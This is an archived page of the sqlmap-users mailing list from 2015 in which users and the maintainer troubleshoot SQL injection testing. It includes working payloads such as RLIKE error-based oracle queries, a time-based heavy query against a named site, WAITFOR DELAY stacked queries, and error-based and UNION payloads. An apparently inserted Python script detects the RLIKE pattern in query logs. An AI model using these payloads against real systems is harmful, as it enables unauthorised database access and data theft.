sqlmap-users Mailing List for sqlmap (Page 14)
Brought to you by: inquisb
From: Bruno F. <ch...@ch...> - 2015-02-22 06:07:22

Hello everyone,

I just started using sqlmap and it detects basic stuff fine so far (database, operating system, PHP version, ...) but when it comes to retrieving information I get a lot of garbage that I can't make sense of. An example of this 'garbage text' can be seen in the attached screenshot.

For those wondering, this is for a security challenge (one of many things that happened as part of the computer science week at the university) and my final goal is to be able to list files on the server (and if they are outside the www folder, I should still be able to read them somehow). But my question is about all those strange characters that can be seen in the attached picture and how to convert them to something useful.

Thank you,
Bruno Ferreira
From: Brandon P. <bpe...@gm...> - 2015-02-21 21:59:14

Right, in the SQL statement where I select 'a', the ORD of this is not greater than 112, and it fails as expected with parentheses not balanced. The query below this that selects the first name from users should be functionally equivalent to select 'a', as MID is used to select the first character of the first username, which is 'admin' as shown, but this statement does not fail as expected. I am at a loss as to why the latter does not fail when the inner select is functionally equivalent to select 'a', and the former fails as expected.

I only bring it up because sqlmap has no problem grabbing the database with RLIKE but can't enumerate the values from the user table, and I logged into the server as root to try to figure out what the issue might be and this seems to be the root cause.

Sent from a phone

> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi.
>
> Maybe I'm mistaken, but you are looking at this RLIKE wrong. Its function here (in your case) is to PROVOKE errors on False, and that's exactly what's going on here.
>
> In case of True, RLIKE is called with perfectly valid 0x7474747474, while in case of False it's called with erroneous regexp 0x28 ('parentheses not balanced').
>
> Bye
>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...> wrote:
>> Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’.
>>
>> But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name  |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2015-02-21 21:36:03

Hi.

Maybe I'm mistaken, but you are looking at this RLIKE wrong. Its function here (in your case) is to PROVOKE errors on False, and that's exactly what's going on here.

In case of True, RLIKE is called with perfectly valid 0x7474747474, while in case of False it's called with erroneous regexp 0x28 ('parentheses not balanced').

Bye

> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...> wrote:
> Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
>
> As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’.
>
> But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned.
>
> Any thoughts?
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> Empty set (0.01 sec)
>
> mysql> SELECT `name` from users LIMIT 0,1;
> +-------+
> | name  |
> +-------+
> | admin |
> +-------+
> 1 row in set (0.00 sec)
>
> mysql>

--
Miroslav Stampar
http://about.me/stamparm
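Miroslav's explanation above (the CASE picks a valid regex on True and an unparseable one on False, so RLIKE raises ERROR 1139 only in the False case) is also a usable detection signature. The script below is an added example, not code from the list or from sqlmap: it scans constructed MySQL query-log lines for that construct, decodes the two hex branches, and flags a query when exactly one branch fails to compile. Python's re module stands in for MySQL's regex engine, which is an approximation, although an unbalanced '(' is rejected by both.

```python
import re
from typing import List, Optional

# Constructed general-log style lines (not from any real server). The first
# three queries are the ones Brandon posted in this thread; the last one is an
# ordinary RLIKE query that must not be flagged.
SAMPLE_LOG = [
    "2015-02-21T20:21:00Z\t 7 Query\tSELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN "
    "(ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));",
    "2015-02-21T20:21:01Z\t 7 Query\tSELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN "
    "(ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));",
    "2015-02-21T20:21:02Z\t 7 Query\tSELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN "
    "(ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));",
    "2015-02-21T20:21:03Z\t 7 Query\tSELECT `name` FROM users WHERE `name` RLIKE '^adm';",
]

# Shape of the error-provoking construct: a CASE whose two branches are hex
# string literals that end up as the regular expression given to RLIKE.
RLIKE_CASE = re.compile(
    r"RLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\s*\((?P<cond>.+?)\)\s*"
    r"THEN\s+0x(?P<then>[0-9A-Fa-f]+)\s+ELSE\s+0x(?P<else_>[0-9A-Fa-f]+)\s+END",
    re.IGNORECASE | re.DOTALL,
)


def hex_literal_to_text(hexdigits: str) -> str:
    """Decode a MySQL 0x... literal the way RLIKE sees it (a byte string)."""
    return bytes.fromhex(hexdigits).decode("latin-1")


def regex_compiles(pattern: str) -> bool:
    """Approximate MySQL's regex validity check with Python's re module."""
    try:
        re.compile(pattern)
        return True
    except re.error:
        return False


def classify_rlike(query: str) -> Optional[dict]:
    """Return details when the query carries the CASE/RLIKE construct, else None.

    error_oracle is True when exactly one branch is a valid regex: the WHEN
    condition then decides whether the server raises ERROR 1139 or not, which
    is what turns a boolean question into an HTTP 500 / no-500 signal."""
    m = RLIKE_CASE.search(query)
    if m is None:
        return None
    then_pat = hex_literal_to_text(m.group("then"))
    else_pat = hex_literal_to_text(m.group("else_"))
    then_ok = regex_compiles(then_pat)
    else_ok = regex_compiles(else_pat)
    return {
        "condition": m.group("cond").strip(),
        "then_pattern": then_pat,
        "else_pattern": else_pat,
        "then_valid": then_ok,
        "else_valid": else_ok,
        "error_oracle": then_ok != else_ok,
    }


def scan_query_log(lines: List[str]) -> List[dict]:
    """Run the classifier over log lines and keep only the error-oracle hits."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify_rlike(line)
        if verdict and verdict["error_oracle"]:
            verdict["line"] = number
            hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in scan_query_log(SAMPLE_LOG):
        print(f"line {hit['line']}: <{hit['condition']}> selects "
              f"{hit['then_pattern']!r} (valid={hit['then_valid']}) or "
              f"{hit['else_pattern']!r} (valid={hit['else_valid']})")
```

All three of Brandon's queries carry the same 'ttttt' / '(' pair, so they are flagged identically regardless of which one the server happened to accept.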
From: Brandon P. <bpe...@gm...> - 2015-02-21 19:22:00

Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.

As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’.

But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned.

Any thoughts?

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.01 sec)

mysql> SELECT `name` from users LIMIT 0,1;
+-------+
| name  |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)

mysql>
From: Loïc T. <lth...@gm...> - 2015-02-19 21:43:06

Oh, never mind, I was using an HTTP request loaded from a file, but using the -u parameter seems to work fine. Thanks anyway.

> 2015-02-19 22:38 GMT+01:00 Loïc THOMAS <lth...@gm...>:
> Hi.
>
> sqlmap wouldn't detect an injection though manually it works perfectly. It is on a POST request.
>
> Using this value will display the page:
>
> id=75102' and (select user()) ='root@localhost' #
>
> Replacing 'root' by anything else won't work (except for the same in uppercase; it seems the charset is case insensitive).
>
> I've tried --level 5, but without any success.
>
> This seems pretty simple to me, I mean it's just basically [int]' AND [payload] [comment]
> (Note that # is the only comment I've found working. -- or /* won't work.)
>
> DBMS is MySQL. I've tried that option too.
>
> Any idea on how to get this to work with sqlmap?
>
> Regards,
>
> Loïc
From: Loïc T. <lth...@gm...> - 2015-02-19 21:38:08

Hi.

sqlmap wouldn't detect an injection though manually it works perfectly. It is on a POST request.

Using this value will display the page:

id=75102' and (select user()) ='root@localhost' #

Replacing 'root' by anything else won't work (except for the same in uppercase; it seems the charset is case insensitive).

I've tried --level 5, but without any success.

This seems pretty simple to me, I mean it's just basically [int]' AND [payload] [comment]
(Note that # is the only comment I've found working. -- or /* won't work.)

DBMS is MySQL. I've tried that option too.

Any idea on how to get this to work with sqlmap?

Regards,

Loïc
From: Miroslav S. <mir...@gm...> - 2015-02-19 14:56:32

This has been replied to earlier. That "bug" was "neutralized".

Kind regards

> On Thu, Jan 29, 2015 at 10:23 AM, sad fastfood <sad...@ma...> wrote:
> Hi!
> Thanks for the greatest tool!
> I've found some problem in the latest revision of sqlmap.
> If you run something like:
>
> sqlmap.py -u "http://www.google.com/news.php?id=5+OR+(4=4)" --skip-urlencode --random-agent --tamper=space2plus --technique=BSU -v 3 --dbms=mssql
>
> And answer 'y' here:
>
> [09:16:17] [WARNING] it appears that you have provided tainted parameter values ('id=5 OR (4=4)') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly are you really sure that you want to continue (sqlmap could have problems)? [y/N]
>
> You'll get some output encoding problem:
>
> [Gw:bM:bw] [dLf4Q] ScuX1KRmE PXuhmWgc 'BBB.EXXE1c.jXg' [Gw:bM:NG] [T830] hcuhRmE jXmmcjhRXm hX hPc hWSEch 4yt [Gw:bM:Nb] [dLf4Q] icj1WSci BcA sWEc jPWSuch '9hI-2' [Gw:bM:Nb] [dLf4Q] EXh Hppo cSSXS jXic: FGG (fWi ycx9cuh) [Gw:bM:Nb] [Zry8T8Q] hPc BcA ucSKcS ScusXmici BRhP Wm Hppo cSSXS jXic (FGG) BPRjP jX91i RmhcSIcSc BRhP hPc Scu91hu XI hPc hcuhu
>
> Printscreen attached.
> In older versions (tested on something like the November 2014 version) there is no such problem.
>
> And also:
> The checkWAF() function is now called every time you run sqlmap. But you really don't need that. Because of this, in case there is a WAF you'll get a timeout every time you run sqlmap on the same target, or may even get an IP ban.
> I think the old variant with the --check-waf option is much better.
>
> Thank you!

--
Miroslav Stampar
http://about.me/stamparm
From: Marc A. C. A. <che...@ou...> - 2015-02-18 11:09:38

Hello. I wonder if sqlmap supports sites vulnerable to "Time-Based Blind SQL Injection using Heavy Queries"? For example:

informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

Can we get into the database of a site vulnerable to time-based SQL injection using heavy queries like the example above with sqlmap? Thank you for letting me know.
From: a d. <deh...@gm...> - 2015-02-09 20:59:58

And when we use -C user_name, does it search for User_name and User_Name column names?

> On Tue, Feb 10, 2015 at 12:11 AM, a dehqan <deh...@gm...> wrote:
> So to search in all tables for value "string", I think the only way is to use an SP like this:
> http://blogs.lessthandot.com/index.php/DataMgmt/DataDesign/the-ten-most-asked-sql-server-questions--1/#2
>
> But is it possible to create it in the SQL shell?
>
> Regards
>
>> On Wed, Feb 4, 2015 at 7:29 PM, a dehqan <deh...@gm...> wrote:
>> How may I deploy this SP with the SQL shell?
>> http://pastebin.com/NtDWccp0
>>
>>> On Wed, Feb 4, 2015 at 7:10 PM, a dehqan <deh...@gm...> wrote:
>>> This searches in one table. How to tell SQL to search in all tables (except writing all tables one by one)?
>>>
>>>> On Wed, Feb 4, 2015 at 7:06 PM, Brandon Perry <bpe...@gm...> wrote:
>>>> You would be better off finding the most likely column to contain that value, then select from table where column = 'value'
>>>>
>>>>> On Wed, Feb 4, 2015 at 9:35 AM, a dehqan <deh...@gm...> wrote:
>>>>> Yes, I think it's the way.
>>>>> How may I search based on column value in all tables, all columns?
>>>>>
>>>>>> On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote:
>>>>>> try --sql-shell
>>>>>>
>>>>>> 2015-02-04
>>>>>> ------------------------------
>>>>>> is2reg
>>>>>> ------------------------------
>>>>>> From: a dehqan <deh...@gm...>
>>>>>> Sent: 2015-02-04 23:20
>>>>>> Subject: Re: [sqlmap-users] Search based on fields value
>>>>>> To: "Brandon Perry" <bpe...@gm...>
>>>>>> Cc: ", sqlmap-users" <sql...@li...>, "Raymond" <ra...@te...>
>>>>>>
>>>>>> Thanks
>>>>>>
>>>>>> You mean first dump all databases and then search in the files?
>>>>>> If yes, I need a way without dumping all databases, because the database is huge of course: about 40 databases.
>>>>>>
>>>>>> And may I use --thread or any other option to make it faster?
>>>>>>
>>>>>>> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> wrote:
>>>>>>> --dump then grep?
>>>>>>>
>>>>>>>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote:
>>>>>>>> Hi
>>>>>>>>
>>>>>>>> Guys, is there any way to search based on field values in sqlmap?
>>>>>>>>
>>>>>>>> For example, how to search in all databases for a column with a value of 1232434345?
>>>>>>>>
>>>>>>>> Regards
>>>>>>>>
>>>>>>>> ------------------------------------------------------------------------------
>>>>>>>> Dive into the World of Parallel Programming. The Go Parallel Website,
>>>>>>>> sponsored by Intel and developed in partnership with Slashdot Media, is your
>>>>>>>> hub for all things parallel software development, from weekly thought
>>>>>>>> leadership blogs to news, videos, case studies, tutorials and more. Take a
>>>>>>>> look and join the conversation now. http://goparallel.sourceforge.net/
>>>>>>>> _______________________________________________
>>>>>>>> sqlmap-users mailing list
>>>>>>>> sql...@li...
>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>> --
>>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>>> http://www.volatileminds.net -- website
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
From: a d. <deh...@gm...> - 2015-02-09 20:41:43

So to search in all tables for value "string", I think the only way is to use an SP like this:
http://blogs.lessthandot.com/index.php/DataMgmt/DataDesign/the-ten-most-asked-sql-server-questions--1/#2

But is it possible to create it in the SQL shell?

Regards

> On Wed, Feb 4, 2015 at 7:29 PM, a dehqan <deh...@gm...> wrote:
> How may I deploy this SP with the SQL shell?
> http://pastebin.com/NtDWccp0
>
>> On Wed, Feb 4, 2015 at 7:10 PM, a dehqan <deh...@gm...> wrote:
>> This searches in one table. How to tell SQL to search in all tables (except writing all tables one by one)?
>>
>>> On Wed, Feb 4, 2015 at 7:06 PM, Brandon Perry <bpe...@gm...> wrote:
>>> You would be better off finding the most likely column to contain that value, then select from table where column = 'value'
>>>
>>>> On Wed, Feb 4, 2015 at 9:35 AM, a dehqan <deh...@gm...> wrote:
>>>> Yes, I think it's the way.
>>>> How may I search based on column value in all tables, all columns?
>>>>
>>>>> On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote:
>>>>> try --sql-shell
>>>>>
>>>>> 2015-02-04
>>>>> ------------------------------
>>>>> is2reg
>>>>> ------------------------------
>>>>> From: a dehqan <deh...@gm...>
>>>>> Sent: 2015-02-04 23:20
>>>>> Subject: Re: [sqlmap-users] Search based on fields value
>>>>> To: "Brandon Perry" <bpe...@gm...>
>>>>> Cc: ", sqlmap-users" <sql...@li...>, "Raymond" <ra...@te...>
>>>>>
>>>>> Thanks
>>>>>
>>>>> You mean first dump all databases and then search in the files?
>>>>> If yes, I need a way without dumping all databases, because the database is huge of course: about 40 databases.
>>>>>
>>>>> And may I use --thread or any other option to make it faster?
>>>>>
>>>>>> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> wrote:
>>>>>> --dump then grep?
>>>>>>
>>>>>>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote:
>>>>>>> Hi
>>>>>>>
>>>>>>> Guys, is there any way to search based on field values in sqlmap?
>>>>>>>
>>>>>>> For example, how to search in all databases for a column with a value of 1232434345?
>>>>>>>
>>>>>>> Regards
>>>>>>
>>>>>> --
>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>> http://www.volatileminds.net -- website
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
From: a d. <deh...@gm...> - 2015-02-09 20:38:31

So this admin user has no insert access, but how to be sure? Is there any command?

> On Mon, Feb 9, 2015 at 7:35 PM, Miroslav Stampar <mir...@gm...> wrote:
> You can't do that in sqlmap and I am pretty sure that it wouldn't suit your needs too.
>
> Also, if there are other techniques available sqlmap will use them for sure instead of stacking for data retrieval. That "statistical model..." message just confused you. It is there so sqlmap would successfully run stacked statements in the first place. Afterwards (after e.g. INSERT) it runs the fastest available technique for data retrieval.
>
> By the way, the result of an INSERT statement is always NULL. Those are basics.
>
> Bye
>
>> On Feb 9, 2015 2:59 PM, "a dehqan" <deh...@gm...> wrote:
>> No, I want stacked queries, but not using time-based injection detection as this one does:
>>
>> id=6&rid=1'; WAITFOR DELAY '0:0:5'--
>>
>> I want stacked queries with other kinds of detection.
>>
>>> On Mon, Feb 9, 2015 at 3:49 PM, Miroslav Stampar <mir...@gm...> wrote:
>>> Really not sure what you are trying to do. Do you want that "error-based" query to be part of "stacked-query" or what?
>>>
>>> Bye
>>>
>>>> On Mon, Feb 9, 2015 at 12:24 AM, a dehqan <deh...@gm...> wrote:
>>>> Maybe my question isn't clear, let me try again:
>>>>
>>>> I need to change the stacked query to not use time-based detection.
>>>>
>>>> sqlmap detects injection there by error-based type too, like this:
>>>>
>>>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>>>>
>>>> How can I have this payload with the stacked query type?
>>>>
>>>> Regards
>>>>
>>>>> On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <deh...@gm...> wrote:
>>>>> Guys, is there any chance?
>>>>>
>>>>> Thanks in advance
>>>>>
>>>>>> On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote:
>>>>>> I mean how may I have a custom payload:
>>>>>>
>>>>>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV
>>>>>>
>>>>>>> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote:
>>>>>>> Hi
>>>>>>>
>>>>>>> sqlmap gave me a shell with injection type of stacked queries, but the payload is like this:
>>>>>>>
>>>>>>> id=6&rid=1'; WAITFOR DELAY '0:0:5'--
>>>>>>>
>>>>>>> When I want to insert with the admin user, sqlmap returns NULL and fails. It only says this before trying:
>>>>>>>
>>>>>>> [WARNING] time-based comparison requires larger statistical model, please wait..............................
>>>>>>>
>>>>>>> Maybe I should change the payload; with what switch can I change the payload?
>>>>>>>
>>>>>>> Regards
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2015-02-09 16:21:06

No. One working UNION payload produced by yourself.

Bye

> On Feb 9, 2015 5:14 PM, "Vojtěch Polášek" <kr...@gm...> wrote:
> Hi,
> thanks for your reply.
> What do you mean by one working union payload?
> Do you mean a payload which causes sqlmap to report the URL as being union injectable?
> Thank you very much,
> Vojta
>
>> On 9.2.2015 13:23, Miroslav Stampar wrote:
>> As Brandon said, one of the columns could be "picky" about the "test" values being used. We use either NULLs or integer values (e.g. 1) and this works quite well in the majority of situations (auto-casting and stuff).
>>
>> Also, there is a possibility that the ORDER BY mechanism is triggering some results, while the UNION query is not possible to achieve. I would suggest you to find one working UNION payload and report back.
>>
>> Bye
>>
>>> On Mon, Feb 9, 2015 at 12:08 AM, Brandon Perry <bpe...@gm...> wrote:
>>> The application could be requiring one of the columns to be in a certain format (perhaps a date, or serialized object) in order to be brought to the UI. Just sending an int/string or a NULL causes the SQL query to succeed, but the app throws an error due to the data not being formatted as expected.
>>>
>>>> On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> wrote:
>>>> Greetings,
>>>> I am doing some pentesting for a corporation.
>>>> I am testing some GET parameter of their web application and I encountered a strange issue.
>>>> The URL seems to be injectable as sqlmap states, but at the end it says that it is not injectable.
>>>> Here is a link to the log with verbosity level 3. Due to confidentiality reasons, I can't provide you with actual requests or responses.
>>>> http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae
>>>> What might be the problem?
>>>> I am running sqlmap 1.0dev-nongit-20150111 from the Blackarch repository of Arch Linux.
>>>> Thank you very much for your opinions,
>>>> Vojta
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2015-02-09 16:20:09

A UNION payload that shows some bit of data that you expect in the response. For instance, perhaps the first column in the union is expected to be a UUID, and the third column is given back in the response.

UNION SELECT '2403db44-b077-11e4-b0e1-000c29133bd7', NULL, 0x6664736166647361, NULL

If that payload were to succeed, 'fdsafdsa' would appear in the response. Figure out how to at least inject with a known payload and report back. :)

> On Mon, Feb 9, 2015 at 10:13 AM, Vojtěch Polášek <kr...@gm...> wrote:
> Hi,
> thanks for your reply.
> What do you mean by one working union payload?
> Do you mean a payload which causes sqlmap to report the URL as being union injectable?
> Thank you very much,
> Vojta
>
>> On 9.2.2015 13:23, Miroslav Stampar wrote:
>> As Brandon said, one of the columns could be "picky" about the "test" values being used. We use either NULLs or integer values (e.g. 1) and this works quite well in the majority of situations (auto-casting and stuff).
>>
>> Also, there is a possibility that the ORDER BY mechanism is triggering some results, while the UNION query is not possible to achieve. I would suggest you to find one working UNION payload and report back.
>>
>> Bye
>>
>>> On Mon, Feb 9, 2015 at 12:08 AM, Brandon Perry <bpe...@gm...> wrote:
>>> The application could be requiring one of the columns to be in a certain format (perhaps a date, or serialized object) in order to be brought to the UI. Just sending an int/string or a NULL causes the SQL query to succeed, but the app throws an error due to the data not being formatted as expected.
>>>
>>>> On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> wrote:
>>>> Greetings,
>>>> I am doing some pentesting for a corporation.
>>>> I am testing some GET parameter of their web application and I encountered a strange issue.
>>>> The URL seems to be injectable as sqlmap states, but at the end it says that it is not injectable.
>>>> Here is a link to the log with verbosity level 3. Due to confidentiality reasons, I can't provide you with actual requests or responses.
>>>> http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae
>>>> What might be the problem?
>>>> I am running sqlmap 1.0dev-nongit-20150111 from the Blackarch repository of Arch Linux.
>>>> Thank you very much for your opinions,
>>>> Vojta
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Vojtěch P. <kr...@gm...> - 2015-02-09 16:13:34
Hi,
thanks for your reply.
What do you mean by one working union payload?
Do you mean payload which causes sqlmap to report URL as being union injectable?
Thank you very much,
Vojta

On 9.2.2015 13:23, Miroslav Stampar wrote:
> As Brandon said, one of columns could be "picky" about the "test" values being used. We use either NULLs or integer values (e.g. 1) and this works quite well in majority of situations (auto-casting and stuff).
>
> Also, there is a possibility that ORDER BY mechanism is triggering some results, while the UNION query is not possible to achieve. I would suggest you to find one working UNION payload and report back.
>
> Bye
>
> On Mon, Feb 9, 2015 at 12:08 AM, Brandon Perry <bpe...@gm...> wrote:
>> The application could be requiring one of the columns to be in a certain format (perhaps a date, or serialized object) in order to be brought to the UI. Just sending an int/string or a NULL causes the SQL query to succeed, but the app throws an error due to the data not being formatted as expected.
>>
>> On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> wrote:
>>> Greetings,
>>> I am doing some pentesting for a corporation.
>>> I am testing some GET parameter of their web application and I encounter a strange issue.
>>> The URL seems to be injectable as sqlmap states, but at the end it says that it is not injectable.
>>> Here is a link to the log with verbosity level 3. Due to confidentiality reasons, I can't provide you with actual requests or responses.
>>> http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae
>>> What might be the problem?
>>> I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of Arch Linux.
>>> Thank you very much for your opinions,
>>> Vojta
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2015-02-09 12:23:22
As Brandon said, one of columns could be "picky" about the "test" values being used. We use either NULLs or integer values (e.g. 1) and this works quite well in majority of situations (auto-casting and stuff).

Also, there is a possibility that ORDER BY mechanism is triggering some results, while the UNION query is not possible to achieve. I would suggest you to find one working UNION payload and report back.

Bye

On Mon, Feb 9, 2015 at 12:08 AM, Brandon Perry <bpe...@gm...> wrote:
> The application could be requiring one of the columns to be in a certain format (perhaps a date, or serialized object) in order to be brought to the UI. Just sending an int/string or a NULL causes the SQL query to succeed, but the app throws an error due to the data not being formatted as expected.
>
> On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> wrote:
>> Greetings,
>> I am doing some pentesting for a corporation.
>> I am testing some GET parameter of their web application and I encounter a strange issue.
>> The URL seems to be injectable as sqlmap states, but at the end it says that it is not injectable.
>> Here is a link to the log with verbosity level 3. Due to confidentiality reasons, I can't provide you with actual requests or responses.
>> http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae
>> What might be the problem?
>> I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of Arch Linux.
>> Thank you very much for your opinions,
>> Vojta
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2015-02-09 12:19:59
